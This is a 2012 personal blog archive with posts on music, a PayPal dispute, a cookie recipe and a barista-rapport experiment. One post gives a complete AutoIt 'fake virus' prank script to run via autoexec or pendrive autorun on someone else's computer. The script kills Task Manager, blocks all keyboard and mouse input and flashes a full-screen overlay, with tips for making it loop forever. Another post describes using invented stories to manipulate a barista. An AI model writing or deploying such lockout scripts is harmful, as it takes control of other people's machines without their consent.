Friday, 20 July 2012
Wednesday, 18 July 2012
Bulletstorm Review
Sunday, 15 July 2012
Board Games
Tuesday, 26 June 2012
I Gots A Busted Machine
So, tradegy has struck. My BackTrack machine has a busted something... After an update that I did the other day (fairly large because I hadn't updated for a few days at that point), I rebooted and got the usual terminal output that you usually see when booting linux. That all seemed fairly normal. But then, tor started to do a little bit of weirdness. Usually, it starts up with linux (or BT, at least) unlike a Vidalia style thing but it usually doesn't output all of it's stuff so verbosely so that you see how far through it's checks it is. So when it starts to do that, I though 'Oops...'
Tuesday, 22 May 2012
Etiquette [Part 3] - Just Help Out!
So, I love people. And messing with people. And socialising in general. You will see that in this post. With that, it's anecdote time.
I was walking home yesterday, probably at about 11:30 in the AM and I walked past an old woman trying to lug a big bag of what appeared to be cement up her garden path. She gave me a smile that was actually more like a grimace and I returned it. As I walked on, I thought: 'That's a pretty huge path...' and it was. It was probably 20 feet long and at a 55 or 60 degree angle. I instantly asked myself how the hell she was going to get up there with that bag and felt kind of bad. So I backtracked a little and offered her my help to carry it up the path. She accepted, thanked me and I got on with it. I lugged it up the path with an iota of the effort that it seemed to be taking her and she thanked me. We chatted for a second then I took off, waved goodbye and felt good about myself.
All I am saying in this small post is just help out. If you see somebody struggling with something, just help them out. They're not going to kill you (I hope...) and they'll probably thank you for it.
Monday, 21 May 2012
Don't You Just Love Education?
As a weekly thing, students at our college have a bulletein emailed to them which alerts them of any interesting things that are happening at the college in the week. Check out a couple of choice slides from the most recent one.
Thursday, 10 May 2012
'Old' Music
14.00 Normal 0 false false false EN-GB X-NONE X-NONE
So, of late I have been listing to Adam Curry’s Daily Source Code. You can go and Google that if you want to know what it’s all about but it’s basically just a radio show that’s streamed live and then podcasted. It’s open source and he takes songs that have been dropped in people’s dropboxes and plays those, which replaces the call-in feature of a normal radio show. I started listening to it because I had heard on No Agenda that he had started back up again and even though I didn’t listen to it before he stopped; I thought I’d give it a try.
I listened to the latest one which was his ‘tribute to the fallen’ episode. He played loads of music from folks that he missed (who were obviously dead) and because he worked in radio and TV for ages, he had stories about a bunch of them. I didn’t really know what to expect going in because I’d never heard the show before and in the opening, he mentioned that he was drunk. Good times!
I really liked it but not just because of the show itself; I loved the music that he played. Stuff like ‘I Can Dream About You’ by Dan Hartman and ‘They Can’t Take That Away From Me’ by Ella Fitzgerald & Louis Armstrong. Music that I’d heard of but never actually heard myself. I made myself push on the couple of tracks that I didn’t like but the good thing is that, with it being a podcast, if you don’t like a song you just fast forward the show: bonus! Because of this, I found a bunch of amazing songs that I have added to my Easy Listening playlist and now listen to all of the time.
This just reinforces my philosophy of musical diversity. If you only listen to one genre then you are severely limiting yourself. If you like music instead of only liking rap or metal, you will find music that can suit any mood that you’re in. Maybe it’s just me who finds that music helps them to change their mood but I’m pretty sure that others feel the same way. In that case, you can use jazz to relax and metal to amp yourself up or some combination thereof. Today’s message is basically ‘Enjoy All Music!’ which I think is simple enough to understand. Go and broaden your horizons, folks!
Scrivener Has A Name Generator!
Just a quick one and before you mention it - I know, I'm behind the times. Scrivener has sat unused on my PC for a while because I haven't been writing all that much of late. I've had revision and coursework to do so other things have kind of taken a back seat. But I decided; bugger it, I might as well write for a bit this morning. What did I find when I updated Scrivener? A name generator, that's what. This thing is fantastic! I no longer have to search obscure websites for names and such! I do usually make up my own but if I happen to need an Arabic-sounding female last name, Scrivener can help me! And it's pretty good as far as name generators go. I'm sure there's some super expensive software that can be bought that will do better but this one is just fine for me. Winner!
Friday, 27 April 2012
The Perils of PayPal - A Cautionary Tale
some third-rate university decides to purchase a collect only item from
Ebay? The answer, one would imagine to be simple: the student pays,
collects the item and all is well. You would, in that case, be dreaming.
The most unfortunate event to befall me of late is that I happened to be
the seller in a transaction eerily similar to this. Selling an exercise
bike (because I have a real one...) should be a simple thing. You list
it as collect only (because really, who could post that?) and someone
buys it and collects it. Everything happened, except the collecting
part. The buyer paid about 5 minutes after the end of the sale, so they
were seemingly rather keen to receive this item. I tel them my address
and contact details so that they can contact me to arrange a collection
time. All is well. I then receive a phone call on Wednesday. It is of an angry student
wanting to know where their item was. I explained calmly to the student
that the listing had clearly said that the item was collect only and I
would be happy to arrange a collection time on the phone. The student
said that they could not collect the item as they lived far away and
they expected me to provide free delivery of the item or they would
complain about it to Ebay. I mentioned that they should go ahead because
they were clearly at fault here, I had not made any mistake. Over the next couple of days, emails were exchanged about fairness
and morality (one would imagine a student to be slightly more mature
than that) and Ebay was called. Ebay sided with me because it was not my
fault but PayPal put a hold on the money that the student had paid to me
so that I did not see a red cent of it, if you will. I phoned PayPal and
was told that as per the terms of service that I agreed to upon creating
a PayPal account, I had to provide tracking and delivery of all items
that I sold. Now, I mentioned that the item was listed as collection
only on Ebay but the nice Filipino gentleman on the phone told me that
this did not matter, the terms of service did not make a distinction for
collection only items. I was told that my only option was to give a
refund and sell the item again. I was not pleased. I, therefore, would advise you to read your T's & C's before signing
up to anything but I know that nobody does. Hell, I only ever read them
when I am doing something with a bank or my very personal details. Even
then, there's rarely anything that you can do about it, even if you
don't agree; you just end up kicked out of the site anyway and when
that's something that you need to do, you end up having to agree. A
prime example of this is with Student Finance but I'll go into that one
at a later date...
Friday, 2 March 2012
The Mobile Phone As An Excuse
Do this the next time you're out and about. Take a look around you at all of the people who are on their mobile phones, doing benign things like checking Facebook and BBM-ing friends. The second that most of them enter the building that they are aiming for, they will put that phone away. Especially when you're walking somewhere deserted, occasionally you will meet another person coming the other way. As long as they don't stab you, more often than not they will get their phone out the second that they see you and then put it away the second that they pass you.
Why do they do this? You might ask. Well, nobody nowadays seems to want to talk to anyway. Even just your phatic conversation of 'Hiya. Nice day for it, ay?' and such. I can't possibly understand this because I generally like to look around me and take in the sights. Even in a hold like some areas around me, it can be useful to look around you and take in some conversation. Because, as everyone should know, what you can find out from normal, everyday chatter is fantastic.
Now go out and pay attention, for all your sakes.
Tuesday, 28 February 2012
Interesting Blog
Just thought I would make a quick post here to let everyone know about a new blog I found the other day. It is at and y'all should check that out for some extra media cynicism in your life.
Tuesday, 21 February 2012
Media Cynicism 101 - A Few Media Cynicism Links
This is a very interesting blog of which I was made aware only recently. It is written by a gentleman by the name of John Ward. He is a retired industry insider with many contacts still inside the many different industries that make the world tick. He writes frequently (pretty much daily, if not multiple times a day) and he always posts interesting media analysis in connection to whatever is happening in the news at that time. Find out more at The No Agenda Show - or
This is a fantastic twice weekly podcast by two media assassins Adam Curry & John C. Dvorak. It doesn't even need explaining. Just listen to it. Yes, there is some serious inside baseball (inside jokes/terms) but once you listen to a few shows you start to see the patterns and recognise what they mean. Also, Google helps a lot... I would recommend, if you're just a beginner, either go back and listen to the back catalog - (from maybe about 290-ish because that's many hours of media assassination) because whilst the news might be outdated, it gives you a good idea of what these two are about and it helps to develop your questioning sense - or you start at episode 318 - - which is where Adam reveals his data collection of details around the oil fields and pipelines in the Middle East and why Syria, Homs in particular, has been in the news of late. This is one of the best investigations that I've seen in a long time, forget The Guardian Investigates: Them Riots What Happened in London. So, there's a few for you to get your feet wet. I will be posting more links as time goes on, so watch the media cynicism 101 tag on this here website for more details.
Why You Should Just... Wait [Pt. 1] - Ending A Lesson
Monday, 6 February 2012
Easy Drive Detection With AutoIt
Friday, 3 February 2012
AutoIt And It's Destructive Potential
AutoIt is amazing. They have a website. Read about it there because it would be a waste of my time to try and explain it to you. The help file is massive so anything you need, you can find there. Also, if you want to use the user created functions and such, everything's in the help file. It really is rather extensive.
So, onto an example. This is basically an example of a script that you can run from an autoexec.bat on someone else's computer to give them a fake and very obvious virus. Let's begin:
#include <GUIConstantsEx.au3>
You will need this line to allow you to use the GUI controls. We will be creating the GUI as an overlay on top of everything on the screen. This will make the user think that something weird is going on with their computer because they can't see any of their windows.
$loop = 0 $x = 1 WinMinimizeAll() GUICreate("LOL PWN TIME", 4000, 4000)
These two variables are needed for a little bit later on. Explanation to follow. Line 3 minimizes all of the other windows which isn't really necessary but it's a pretty cool action to use in some other scripts. Line 4 is obviously the GUI creation. It's 4000 by 4000 because I'm not aware of many people that run their resolution this high so it's likely to work with everyone but by all means, change it to your liking.
while $loop < 20 <span style="white-space: pre;"> </span>ProcessClose("taskmgr.exe") <span style="white-space: pre;"> </span>GUISetState(@SW_SHOW) <span style="white-space: pre;"> </span>GUISetBkColor(0xFF0000) <span style="white-space: pre;"> </span>MouseMove($loop, $loop + 1) <span style="white-space: pre;"> </span>GUISetBkColor(0x000000) <span style="white-space: pre;"> </span>GUISetBkColor(0xFFFFFF) <span style="white-space: pre;"> </span>for $x = 300 to 3000 step 300 <span style="white-space: pre;"> </span>BlockInput(1) <span style="white-space: pre;"> </span>Beep($x,1) <span style="white-space: pre;"> </span>Next <span style="white-space: pre;"> </span>$loop = $loop + 1 wend
Here is the meat of the script, as well as those variables that I promised earlier. The while loop is there to control the amount of times the screen will flash. If you want an infinite loop, you can either set this to = 0 and comment out the second to last line or just comment out the second to last line; it's really up to you. Line 2 closes any attempts that the user makes at pressing ctrl + alt + del so that they think that their pc is truly locked up. Line 3 shows the GUI. Line 4 sets the colour of the GUI to red. Line 5 moves the mouse creepily. You can set this to a randomly generated number but it will only work really well on fast machines, not on the ones with crappy processors. Lines 6 & 7 sets the GUI colours to black and white respectively. You can change any one of the colour lines for any colour that you like, as well as add a sleep if you want one to stay on for longer.
Line 8 is where the beep is generated. 300 to 3000 is a pretty good range for the beep frequency but feel free to play around with this as some interesting things can happen when you do. The 'step' is basically how many tones you want in between 300 and 3000. if you do step 1 then it will play every sound which is interesting but takes a very long time. Line 9 just blocks user input every time the sound is played because if it was outside this loop and in the while loop, they would have a small window of time in which to press ctrl + alt + del which would be bad... For the parameters of beep, we give it the x variable which is being constantly changed and the time for each beep which I have at 1 for the sake of speed. Playing around with this is very interesting and should definitely be explored. Then, we have the line that you can comment out if you want an infinite loop. So after you're done playing around with the script, comment this out and make it autoexec when a pendrive is inserted into a pc and viola! Magic virus funtimes.
It won't let me attach the whole script so I'll paste it all in here if you want to copy it verbatim:
In code: #cs ############################################################################ AutoIt Version: Author: squ1r3ll Script Function: To make weird things happen if you need to haze someone or make them think that they have a virus #ce ############################################################################ #include <GUIConstantsEx.au3> $loop = 0 $x = 1 WinMinimizeAll() GUICreate("LOL PWN TIME", 4000, 4000) ;create the GUI overlay for the screen while $loop < 20 ;controls how many times the screen flashes along with line 26 ProcessClose("taskmgr.exe") GUISetState(@SW_SHOW) ;show the GUI GUISetBkColor(0xFF0000) ;set the colour to black MouseMove($loop, $loop + 1) GUISetBkColor(0x000000) ;set the colour to red ;MouseMove($loop, $loop + 1) GUISetBkColor(0xFFFFFF) ;set the colour to white for $x = 300 to 3000 step 300 <span style="white-space: pre;"> </span> BlockInput(1) ;block all user input every loop so that ctrl + alt + del won't work very well <span style="white-space: pre;"> </span> Beep($x,1) ;make the weird beeping noise Next $loop = $loop + 1 ;comment this line out for an infinite loop wend
In plaintext:
#cs ############################################################################
AutoIt Version:
Author: squ1r3ll
Script Function:
To make weird things happen if you need to haze someone or make them think that they have a virus
#ce ############################################################################
#include <GUIConstantsEx.au3>
$loop = 0
$x = 1
GUICreate("LOL PWN TIME", 4000, 4000) ;create the GUI overlay for the screen
while $loop < 20 ;controls how many times the screen flashes along with line 26
GUISetState(@SW_SHOW) ;show the GUI
GUISetBkColor(0xFF0000) ;set the colour to black
MouseMove($loop, $loop + 1)
GUISetBkColor(0x000000) ;set the colour to red
;MouseMove($loop, $loop + 1)
GUISetBkColor(0xFFFFFF) ;set the colour to white
for $x = 300 to 3000 step 300
BlockInput(1) ;block all user input every loop so that ctrl + alt + del won't work very well
Beep($x,1) ;make the weird beeping noise
$loop = $loop + 1 ;comment this line out for an infinite loop
Have fun!
'The Usual, Sir?' or Making an Impression
- I attended the same coffee shop
- I arrived at the same time (9 AM)
- I attended on the same days of every week
- I ordered the same drink
Now, I don't have many distinguishing features. I am taller than roughly 94% of the people that I meet on a regular basis but I don't exactly have a Mohawk or piercings all over my face. I could have added one of these to make myself more recognisable but the one ground rule that I set myself before beginning this was that I would not sacrifice my dignity for it. There's not a whole bunch of it to start with so I didn't want to lose much during the experiment. This means that I had to use small tidbits of information that they gave to me to make them think 'Oh wow, this guy actually listens, maybe he's worth remembering...'
At this point, it's worth giving a short list of the baristas whom I saw on those days:
- 'The Chick with Dreads' (as she calls herself, not a name I gave her)
- The European Chick
- The Bun Chick (hair, not baked goods)
Three baristas. Two days a week. 1.5 interactions with each every week. And I had to get them to remember me. I started out by just observing. Checking out the relationship between the baristas which seemed to be fairly good. They all seemed to be colleagues and friends, neither one of them being the owner of the place. Which was useful for me because I could then observe small details that they shared when they were talking amongst themselves. Like The Chick With Dreads (herein referred to as Dreads Chick) has a cat. (Quick side-note: lots of my techniques from here in come from <a href=">this book</a> which you should all go and read now!) This gave me a third party reference to use and due to the fact that it was obvious I was going to have to leave the shop at some point, I already had an artificial time constraint.
Therefore, the next time she was looking my way, I made sure that I glanced at watch, adopted an alarmed facial expression and gulped down the last few mouthfuls of my coffee. Quickly gathering my belongings, I made for the door. But before I got there, I made sure that I turned to her and said 'I'm sorry to bother you, ahh, I'm about to be late for a meeting but I didn't want to forget this. I overheard you talking about your cat earlier and I'm looking to get a cat for my girlfriend as a third anniversary present and was wondering, is there a type I should get if I want a specific thing from them, like you would with dogs, or are they all relatively similar?' This worked like a charm because of a couple of things. I used the artificial time constraint (which made her think that I wasn't after a long conversation because I was late) as well as the fact that I had a long term girlfriend (so that she wouldn't think that I was coming on to her because I've been with this girl 3 years so I must be faithful) and the sympathy theme (which makes her want to help me because I know nothing about a subject and she can enlighten me). There was also an ego booster in there (because she knew more than me so she felt superior). All of this, as well a very slight expression of worry on my face indicated that I was genuinely after some advice on cats. I wasn't. I do not have a long term girlfriend, I wasn't late and I don't really have an interest in cats. But all of those things made it seem like I did, so she talked to me. For about 15 minutes, we discussed the merits of different types of cats and what my 'girlfriend' preferred in a pet. This was useful because now she knows a little about me (in theory) and she will remember the nice chat we had until I see her next week. She was the Tuesday morning barista so I attempted the same thing on Thursday but got no useable information from either barista. This meant waiting until the next Tuesday.
Come the next Tuesday and my techniques did have an effect. As soon I walked through the door, Dreads Chick turned and looked at me. For a moment, she didn't recognise me but I could see it on her face as soon as she did. She smiled at me and we exchanged pleasantries whilst she made my coffee. She had remembered me but not my order, just as I had expected. Oh well, one step at a time. So she inquired about the cat and I mentioned that I was looking at places to buy one from. She helpfully gave me a couple of good local places and I thanked her and left (after drinking my coffee, of course). The next week, I went back. Same thing happened, exchange of pleasantries, etc but this time, she asked 'You having a large hazelnut latte again?' And I smiled. She remembered. I said yes but to go because I was in a bit of a hurry at the time and I left. The next week it was, 'You having your usual?' Bang. Success. So now, this is my Tuesday coffee shop. I am working my way up with the others but not as persistently because I know that can do it quickly if I need to.
Four weeks. From start to finish of my experiment. She remembered my drink after three but it took four for her to know that it was my regular. If you want some helpful tips on creating rapport like this, read the book in the link above. It is an extremely useful aide.
Now, go forth and have 'the usual!'
Sunday, 15 January 2012
Super Oat Cookies
So, I have started to cook quite a bit again. I don't really know why I stopped, I guess I ran out of time. That is why I have now decided to cook much more often. Preferably at least once a day. Even if it's just something as simple as this recipe I am about to post.
Without further ado, here it is:
Super Oat Cookies
1/4 cup honey
3/4 cup quick oats
1 1/2 tsp. cinnamon
1 tbsp. flaxseed meal
1 tbsp. oatbran
1 tbsp. brown sugar
1/4 cup melted butter/margarine
Preheat oven to 150°C. Begin melting butter. Add all dry ingredients to a mixing bowl and loosely combine. Add butter, mix loosely. Add honey, mix until well combined. Using your hands, form mixture into small balls and add to greased cookie sheet (should be about 6). Bake for 28 minutes. Remove from oven and transfer to cooling rack. Allow to cool and enjoy!
So, there you go. Just for full disclosure's sake, I obtained the basis for this recipe from Food & Whine but, as a major point, I removed the Cheerios. Seems to kind of take the heart out of the recipe, I think but it tastes really good without them. Plus the fact that I usually like something that's at least a handful for me, not a 6 year old. The original is tasty but that's my take on it. That blog is, by the way, one of my go to's for great recipes. It's also made it to my RSS reader which not many things make it to (I don't like having to wade through pointless news to find the gems).